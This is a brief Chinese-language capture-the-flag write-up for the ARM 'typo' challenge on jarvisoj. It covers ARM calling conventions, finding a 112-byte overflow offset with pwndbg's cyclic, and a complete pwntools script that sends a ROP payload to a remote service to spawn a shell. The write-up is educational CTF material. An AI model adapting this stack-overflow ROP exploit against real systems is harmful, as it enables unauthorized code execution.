arm 的参数 1 ~ 4 分别保存到 r0 ~ r3 寄存器中, 剩下的参数从右向左依次入栈, 被调用者实现栈平衡, 返回值存放在 r0中
by the way, arm 的 pc 指针相当于 eip/rip, b/bl 等指令实现了跳转
按程序流程输入超长的字符串,这里用pwndbg中的cyclic构造字符串,因为peda中的pattern好像有点问题。输入超长字符串后发现程序崩溃,返回值保存在r0中,也就是显示的rax。
查找r0中0x62616164在字符串的位置,为112,也就是缓冲区是0~111。
pwndbg> cyclic -l 0x62616164
112
接下来查找可利用的gadget
那么构造payload='a'*112+p32(0x20904)+p32(0x6c384)+p32(1)+p32(system_address)
找system_address只能靠经验了,符号表被去除了,网上有方法用rizzo还原符号表但一直安装不成功。
脚本如下:
from pwn import *
context.log_level = "debug"
#p = process("./typo")
p = remote("pwn2.jarvisoj.com", 9888)
p.sendafter("quit\n", "\n")
p.recvline()
payload = 'a' * 112 + p32(0x20904) + p32(0x6c384) + p32(1) + p32(0x110B4)
p.sendlineafter("\n", payload)
p.interactive()